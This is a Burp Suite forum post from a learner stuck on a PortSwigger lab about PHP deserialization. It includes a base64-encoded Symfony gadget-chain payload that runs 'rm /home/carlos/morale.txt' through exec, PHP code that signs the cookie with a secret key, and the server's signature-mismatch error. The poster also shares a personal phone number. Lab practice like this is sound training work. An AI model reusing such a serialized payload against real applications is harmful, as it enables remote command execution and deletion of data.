Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Exploiting PHP deserialization with a pre-built gadget chain payload

Aman | Last updated: Jul 15, 2020 07:16PM UTC

Cookie: session=<?php echo $payload = urlencode('{"token":"' .Tzo0NzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxUYWdBd2FyZUFkYXB0ZXIiOjI6e3M6NTc6IgBTeW1mb255XENvbXBvbmVudFxDYWNoZVxBZGFwdGVyXFRhZ0F3YXJlQWRhcHRlcgBkZWZlcnJlZCI7YToxOntpOjA7TzozMzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQ2FjaGVJdGVtIjoyOntzOjExOiIAKgBwb29sSGFzaCI7aToxO3M6MTI6IgAqAGlubmVySXRlbSI7czoyNjoicm0gL2hvbWUvY2FybG9zL21vcmFsZS50eHQiO319czo1MzoiAFN5bWZvbnlcQ29tcG9uZW50XENhY2hlXEFkYXB0ZXJcVGFnQXdhcmVBZGFwdGVyAHBvb2wiO086NDQ6IlN5bWZvbnlcQ29tcG9uZW50XENhY2hlXEFkYXB0ZXJcUHJveHlBZGFwdGVyIjoyOntzOjU0OiIAU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxQcm94eUFkYXB0ZXIAcG9vbEhhc2giO2k6MTtzOjU4OiIAU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxQcm94eUFkYXB0ZXIAc2V0SW5uZXJJdGVtIjtzOjQ6ImV4ZWMiO319Cg==. '","sig_hmac_sha1":"' . hash_hmac('sha1', Tzo0NzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxUYWdBd2FyZUFkYXB0ZXIiOjI6e3M6NTc6IgBTeW1mb255XENvbXBvbmVudFxDYWNoZVxBZGFwdGVyXFRhZ0F3YXJlQWRhcHRlcgBkZWZlcnJlZCI7YToxOntpOjA7TzozMzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQ2FjaGVJdGVtIjoyOntzOjExOIAKgBwb29sSGFzaCI7aToxO3M6MTI6IgAqAGlubmVySXRlbSI7czoyNjoicm0gL2hvbWUvY2FybG9zL21vcmFsZS50eHQiO319czo1MzoiAFN5bWZvbnlcQ29tcG9uZW50XENhY2hlXEFkYXB0ZXJcVGFnQXdhcmVBZGFwdGVyAHBvb2wiO086NDQ6IlN5bWZvbnlcQ29tcG9uZW50XENhY2hlXEFkYXB0ZXJcUHJveHlBZGFwdGVyIjoyOntzOjU0OiIAU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxQcm94eUFkYXB0ZXIAcG9vbEhhc2giO2k6MTtzOjU4OiIAU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxQcm94eUFkYXB0ZXIAc2V0SW5uZXJJdGVtIjtzOjQ6ImV4ZWMiO319Cg==, tmg1kfjhgpy7yo1c3tdfvs1zv3h0qqyg) . '"}'); i am not able to Solve Lab with given solution and payload. why. it is a bug? or any other thing. 9413139313 my whatsapp. give me proper solution plz. why i am not able to solve this lab. just getting this Response. but Not Solving. help me Guys. HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Connection: close Content-Length: 2429 <!DOCTYPE html> <html> <head> <link href="/resources/css/labs.css" rel="stylesheet"> <title>Exploiting PHP deserialization with a pre-built gadget chain</title> </head> <body> <div theme=""> <script src="/resources/js/labHeader.js"></script> <div id="labHeader"> <section class="pageHeader"> <div class="container"> <img src="/resources/images/logoAcademy.svg"> <div class="title-container"> <h2>Exploiting PHP deserialization with a pre-built gadget chain</h2> <a class="link-back" href="https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-exploiting-php-deserialization-with-a-pre-built-gadget-chain"> Back&nbsp;to&nbsp;lab&nbsp;description&nbsp;<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 28 30" enable-background="new 0 0 28 30" xml:space="preserve" title="back-arrow"> <g> <polygon points="1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15"></polygon> <polygon points="14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15"></polygon> </g> </svg> </a> </div> <div class="widgetcontainer-lab-status is-notsolved"> <span>LAB</span> <p>Not solved</p> <span class="lab-status-icon"></span> </div> </div> </section> </div> <section class="maincontainer"> <div class="container"> <header class="navigation-header"> <section class="top-links"> <a href=/>Home</a><p>|</p> </section> </header> <p class=is-warning>Internal Server Error: Symfony Version: 4.3.6</p> <p class=is-warning>PHP Fatal error: Uncaught Exception: Signature does not match session in Command line code:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7</p> <!-- <a href=/cgi-bin/phpinfo.php>Debug</a> --> </div> </section> </div> </body> </html>

Hannah, PortSwigger Agent | Last updated: Jul 16, 2020 07:47AM UTC